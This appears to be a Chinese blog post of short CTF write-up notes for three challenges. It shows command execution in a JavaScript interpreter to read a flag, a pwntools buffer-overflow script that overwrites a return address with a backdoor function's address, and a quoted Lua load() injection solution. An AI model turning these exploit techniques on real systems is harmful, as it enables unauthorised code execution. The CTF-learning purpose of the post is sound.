这个题不会,搜了下wp原来这么简单,一直用js都是写网页,没用过os库
题目是个大文件,基本没法看。运行后出提示符,打help有点提示。
其实就是个js的解释器,直接运行命令就能拿到flag
js> os.system('cat flag')
os.system('cat flag')
cyberpeace{fbbe21cdff06b6bb983a88c58185de99}
js> warmup
这个题有后门,有溢出,直接溢出到返回地址写后门
from pwn import *
p = remote('111.200.241.244',62270) #node3.buuoj.cn
p.sendafter('>',b'A'*0x48 + p64(0x40060d))
p.interactive()
20和8应该属于同一类,那个是js这个是lua。同样不用写东西。复制了一段网上搜到的exp,从头到尾说完,实际上就是最后执行那一句
SOLUTION
--------
The player is expected to follow a deductive path:
1. Connect and try the commands.
2. Discover that 'help' actually return some binary data.
3. Upon analysis the player realizes that binary data is compiled LUA script.
4. The LUA script will not decompile because it is corrupt.
5. Comparing is own trials, the player will discover that the header is missing the first byte.
6. Once the header is fixed the player uses unluac tool to decompile.
7. After auditing the code, the player noticed the injection.
8. use `load('lines = io.lines("flag")\n for l in lines do writeline(l) end') -- ` string to obtain the key. There maybe more be more than one solution.
1826
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
